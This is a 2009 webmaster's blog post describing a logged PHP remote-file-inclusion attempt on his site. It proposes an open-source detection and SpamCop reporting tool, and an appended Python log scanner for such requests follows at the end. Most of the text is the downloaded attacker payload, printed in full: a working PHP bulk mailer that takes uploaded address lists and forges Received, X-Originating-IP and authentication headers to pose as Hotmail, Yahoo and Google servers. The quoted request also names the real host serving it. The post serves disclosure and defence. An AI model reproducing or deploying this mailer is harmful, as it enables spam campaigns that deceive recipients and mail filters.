T-Qualizer.com

On my websites, I'm running a small detection tool for PHP code injections. It automatically downloads the file the hacker tries to include. Below I show you a real example from my log files and the downloaded spammer tool. This stuff makes clear where the increased spam runs of the last time come from. My suggestion is to offer my detection tool as an open-source project and expand it to a real-time reporting tool that's able to report these attempts straight to SpamCop. Of course this also requires a SpamCop-side tool to receive them. As an open-source project it may be expanded to a complete honeypot to detect and eliminate spam runs before they have done their job.

Here is an example of a nice hacker spam action, really happened and logged from my website. Nothing is faked or changed.

Requested URL on 2009-12-29 at 21:56 GMT, from IP [82.155.84.123] (bl6-84-123.dsl.telepac.pt):
www.t-qualizer.eu/index.php?sessid=y1ufj9funveq5dw50l&lang=en&page=http://www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt?

You can see that the hacker tried to include a URL in the hope that it will be executed. Here comes the script, downloaded by my detection tool from: www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt? At the time I'm writing this post, 11 days later, it's still online!
<html> <head> <title>35437282898562626475892888</title> <style type="text/css"> <!-- .cxtexto { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: thin #000000; background-color: #FFFFFF; color: #000000; } --> </style> </head> </div> <table width="516" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC" id="table1"> <form name="form1" method="post" action="" enctype="multipart/form-data"> <input name="teste" type="hidden" class="cxtexto" id="teste" value="yep" size="3" maxlength="3"> <tr> <td colspan="4" valign="top">  </td> </tr> <tr> <td valign="top"> <div align="right"> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <strong>nome</strong></font></div></td> <td valign="middle" bgcolor="#CCCCCC">  <input name="NRemetente" type="text" class="cxtexto" id="NRemetente" value="<?php echo stripslashes($_POST['NRemetente']);?>" size="33" maxlength="60"></td> <td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1"> email</font></strong></div></td> <td valign="middle" bgcolor="#CCCCCC">  <input name="ERemetente" type="text" class="cxtexto" id="ERemetente" value="<?php echo stripslashes($_POST['ERemetente']);?>" size="39" maxlength="60"></td> </tr> <tr> <td valign="top" colspan="4" height="2"></td> </tr> <tr> <td valign="top"> <div align="right"><strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1"> assunto</font></strong></div> </td> <td valign="middle" bgcolor="#CCCCCC">  <input name="Assunto" type="text" class="cxtexto" id="Assunto" value="<?php echo stripslashes($_POST['Assunto']);?>" size="33" maxlength="60"></td> <td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1"> lista</font></strong></div></td> <td valign="middle" bgcolor="#CCCCCC" class="cxprocura">  <input name="emails" type="file" class="cxtexto" id="emails"></td> </tr> <tr> <td colspan="4" valign="top" 
height="2"></td> </tr> <tr> <td colspan="2" valign="top"> <div align="center"> <strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1">i</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>ntervalo </strong></font> <input name="Interval" type="text" class="cxtexto" id="interval" value="0" size="3" maxlength="3"> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <strong>segundos</strong></font></div></td> <td colspan="2" valign="middle" bgcolor="#CCCCCC"> <p align="center"> <input type="submit" name="Submit2" value="enviar"> <input name="Submit" type="button" onClick='window.close()' value="desistir"></td> </tr> <tr> <td colspan="4" valign="top"> <p align="center"><strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1">conteudo</font></strong></td> </tr> <tr> <td colspan="4" align="center"> <p align="center"> <textarea name="Conteudo" cols="92" rows="24" wrap="VIRTUAL" class="cxtexto" id="Conteudo"><?php echo stripslashes($_POST['Conteudo']);?></textarea></td> </tr> <tr> <td colspan="4" valign="top">  </td> </tr> </form> </table> <?php //Source PHP //Para melhor 'debuging' //error_reporting(E_ALL); [at]ignore_user_abort(TRUE); error_reporting(0); [at]set_time_limit(0); ini_set("memory_limit", "-1"); //Verifica se os dados foram preenchidos $teste = $_POST['teste']; If ($teste == null) { exit(/*"<br><center><b>Preencha corretamente os campos</b></center>"*/); } //Recupera os dados do FORM $FromName = $_POST['NRemetente']; $FromMail = $_POST['ERemetente']; $Subject = $_POST['Assunto']; $MailServer = explode("[at]",$FromMail,2); $MailServer = $MailServer['1']; $arq_name = $_FILES["emails"]["name"]; $arq_temp = $_FILES["emails"]["tmp_name"]; $Lista = (file($arq_temp)); $QtdMail = count($Lista); $Conteudo = stripslashes($_POST['Conteudo']); $IntervalX = $_POST['Interval']; $ip = gethostbyname($MailServer); //Arquivos de configuracao [at]ini_set("sendmail_from", $FromMail); [at]ini_set("time_limit",0); 
//Define os headers do email // $headers = "From: $FromName <$FromMail>\n"; // $headers .= "MIME-Version: 1.0\n"; // $headers .= "Content-type: text/html; charset=iso-8859-1\n"; // $headers .= "Content-Transfer-encoding: 8bit\n"; // $headers .= "Reply-To: $FromName <$FromMail>\n"; // $headers .= "Return-Path: $FromMail\n"; // $headers .= "Message-ID: <".md5(uniqid(time()))."[at]$MailServer>\n"; // $headers .= "X-Priority: 3\n"; // $headers .= "X-MSmail-Priority: High\n"; // $headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n"; // $headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n"; // $headers .= "X-Mailer: iGMail [www.ig.com.br]\n"; // $headers .= "X-Originating-Email: [$FromName]\n"; // $headers .= "X-Sender: $FromName\n"; // $headers .= "X-Originating-IP: [201.201.120.121]\n"; // $headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\n"; //Inicia o envio If ($QtdMail <= 1) { exit; } else { echo str_repeat("-", 126)."<br>"; echo "<b>De:</b> $FromName <$FromMail><br>"; echo "<b>Assunto:</b> $Subject<br>"; echo "<b>Para Lista:</b> $arq_name ($arq_temp) <b>contendo</b> $QtdMail <b>e-mails</b><br>"; echo "<b>Com intervalo de:</b> $IntervalX <b>segundos</b><br>"; echo str_repeat("-", 126)."<br>"; } $error = 0; $donen = 0; while (list($pos, $val) = each($Lista)) { $val = trim($val); if (strstr(strtolower(htmlentities($val)), 'yahoo') == '' && strstr(strtolower(htmlentities($val)), 'hotmail') == '' && strstr(strtolower(htmlentities($val)), 'live') == '') { //echo "\r\n ENTRA GMAIL \r\n"; $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com'); $ip2 = gethostbyname('mta269.mail.re4.yahoo.com'); $headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Return-Path: <" . $FromMail . ">\r\n"; $headers .= "X-YMailISG: " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . 
md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n"; $headers .= "X-Originating-IP: [" . $ip1 . "]\r\n"; $headers .= "Authentication-Results: mta269.mail.re4.yahoo.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n"; $headers .= "Received: from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mta269.mail.re4.yahoo.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Received: from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Message-ID: <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n"; $headers .= "Return-Path: " . $FromMail . "\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $headers .= "X-Originating-IP: [" . $ip . "]\r\n"; $headers .= "From: " . $FromName . " " . "<" . $FromMail . ">\r\n"; $headers .= "To: " . htmlentities($val) . "\r\n"; $headers .= "Importance: Normal\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "X-OriginalArrivalTime: " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n"; $headers .= "Content-Length: " . trim(strlen($Conteudo)) . 
"\r\n"; } elseif (strstr(strtolower(htmlentities($val)), 'gmail') == '' && strstr(strtolower(htmlentities($val)), 'hotmail') == '' && strstr(strtolower(htmlentities($val)), 'live') == '') { //echo "\r\n ENTRA YAHOO \r\n"; $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com'); $ip2 = gethostbyname('mail-fx0-f217.google.com'); $headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Return-Path: <" . $FromMail . ">\r\n"; $headers .= "X-YMailISG: " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n"; $headers .= "X-Originating-IP: [" . $ip1 . "]\r\n"; $headers .= "Authentication-Results: mail-fx0-f217.google.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n"; $headers .= "Received: from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Received: from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Message-ID: <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n"; $headers .= "Return-Path: " . $FromMail . "\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $headers .= "X-Originating-IP: [" . $ip . "]\r\n"; $headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . 
" Adicionar remetente à lista de contatos\r\n"; $headers .= "To: " . htmlentities($val) . "\r\n"; $headers .= "Importance: Normal\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "X-OriginalArrivalTime: " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n"; $headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n"; } elseif (strstr(strtolower(htmlentities($val)), 'gmail') == '' && strstr(strtolower(htmlentities($val)), 'yahoo') == '') { //echo "\r\n ENTRA HOTMAIL \r\n"; $ip1 = gethostbyname('mta269.mail.re4.yahoo.com'); $ip2 = gethostbyname('mail-fx0-f217.google.com'); $headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Return-Path: <" . $FromMail . ">\r\n"; $headers .= "X-YMailISG: " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n"; $headers .= "X-Originating-IP: [" . $ip1 . "]\r\n"; $headers .= "Authentication-Results: mail-fx0-f217.google.com from=yahoo.com; domainkeys=neutral (no sig); from=yahoo.com; dkim=neutral (no sig)\r\n"; $headers .= "Received: from " . $ip1 . " (EHLO mta269.mail.re4.yahoo.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Received: from BLU119-W27 ([" . $ip1 . "]) by mta269.mail.re4.yahoo.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . 
" -0700\r\n"; $headers .= "Message-ID: <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n"; $headers .= "Return-Path: " . $FromMail . "\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $headers .= "X-Originating-IP: [" . $ip . "]\r\n"; $headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n"; $headers .= "To: " . htmlentities($val) . "\r\n"; $headers .= "Importance: Normal\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "X-OriginalArrivalTime: " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n"; $headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n"; } if (mail($val, $Subject, $Conteudo, $headers)) { $donen++; echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">'; } else { $error++; echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">'; } $headers = ""; echo htmlentities($val).' [ok='.$donen.' error='.$error.' total='.($pos+1).'/'.$QtdMail.']</font><br>'; sleep($IntervalX); } unlink($arq_temp); ?> </body> </html> If SpamCop and webmasters are interested in a detection and realtime reporting tool, then let it hear and I will post my scri_pt for a opensource project.
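The poster's detection tool is not published on this page. As an added example (not the poster's code), here is the defender-side core of such a tool: it scans access-log lines for a query parameter whose value is a URL or PHP stream wrapper, the pattern of the `page=http://...` request quoted above, and tallies the attempts per source IP for reporting; the log lines, hostnames and IPs below are constructed placeholders, and the allow-list check shows the fix on the application side (`allow_url_include=Off` in php.ini closes the same hole server-wide).

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), modelled on the
# request quoted in the post; payload.example.net and the IPs are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Dec/2009:21:56:01 +0000] "GET /index.php?sessid=abc&lang=en&page=http://payload.example.net/cs.txt? HTTP/1.1" 200 512
198.51.100.7 - - [29/Dec/2009:21:57:10 +0000] "GET /index.php?sessid=def&lang=en&page=contact HTTP/1.1" 200 2048
203.0.113.5 - - [29/Dec/2009:21:58:44 +0000] "GET /index.php?page=ftp://payload.example.net/x.php HTTP/1.1" 200 512
192.0.2.9 - - [29/Dec/2009:22:00:00 +0000] "GET /index.php?page=php://input HTTP/1.1" 500 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Schemes that turn an include($_GET['page']) into a remote/attacker-controlled
# include when PHP's allow_url_include is on (php:// and data:// are wrappers).
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "expect"}


def find_rfi_attempts(log_text):
    """Return one record per query parameter whose value carries a remote scheme."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable request line; skip rather than guess
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            scheme = urlsplit(value).scheme.lower()
            if scheme in REMOTE_SCHEMES:
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "param": name, "url": value})
    return hits


def summarize_by_ip(hits):
    """Attempt count per source IP, the unit a report to an abuse desk would use."""
    return dict(Counter(h["ip"] for h in hits))


def is_allowed_page(value, allowed_pages):
    """Application-side fix: only include pages from a fixed allow-list."""
    return value in allowed_pages


if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG):
        print(f"{h['time']} {h['ip']} param={h['param']} url={h['url']}")
    print(summarize_by_ip(find_rfi_attempts(SAMPLE_LOG)))
```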